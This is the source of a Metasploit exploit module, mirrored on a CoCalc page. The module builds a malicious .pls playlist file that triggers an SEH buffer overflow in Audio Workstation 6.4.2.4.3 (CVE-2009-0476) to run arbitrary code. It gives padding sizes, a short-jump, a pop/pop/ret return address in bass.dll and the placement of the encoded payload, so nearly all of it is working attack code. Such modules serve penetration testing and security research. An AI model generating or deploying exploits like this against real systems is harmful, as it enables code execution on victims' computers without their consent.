CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/audio_wkstn_pls.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.

17
        When opening a malicious pls file with the Audio Workstation,

18
        a remote attacker could overflow a buffer and execute

19
        arbitrary code.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         => [ 'germaya_x', 'dookie', ],

23
      'References'     =>

24
        [

25
          [ 'CVE', '2009-0476' ],

26
          [ 'OSVDB', '55424' ],

27
          [ 'EDB', '10353' ],

28
        ],

29
      'DefaultOptions' =>

30
        {

31
          'EXITFUNC' => 'seh',

32
          'DisablePayloadHandler' => true,

33
          'AllowWin32SEH' => true

34
        },

35
      'Payload'        =>

36
        {

37
          'Space'    => 4100,

38
          'BadChars' => "\x00",

39
          'StackAdjustment' => -3500,

40
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,

41
          'DisableNops'   =>  'True',

42
        },

43
      'Platform' => 'win',

44
      'Targets'        =>

45
        [

46
          [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll

47
        ],

48
      'Privileged'     => false,

49
      'DisclosureDate' => '2009-12-08',

50
      'DefaultTarget'  => 0))

51


52
    register_options(

53
      [

54
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),

55
      ])

56


57
  end

58


59
  def exploit

60


61
    sploit = rand_text_alpha_upper(1308)

62
    sploit << "\xeb\x16\x90\x90"

63
    sploit << [target.ret].pack('V')

64
    sploit << make_nops(32)

65
    sploit << payload.encoded

66
    sploit << rand_text_alpha_upper(4652 - payload.encoded.length)

67


68
    print_status("Creating '#{datastore['FILENAME']}' file ...")

69
    file_create(sploit)

70


71
  end

72
end

73


74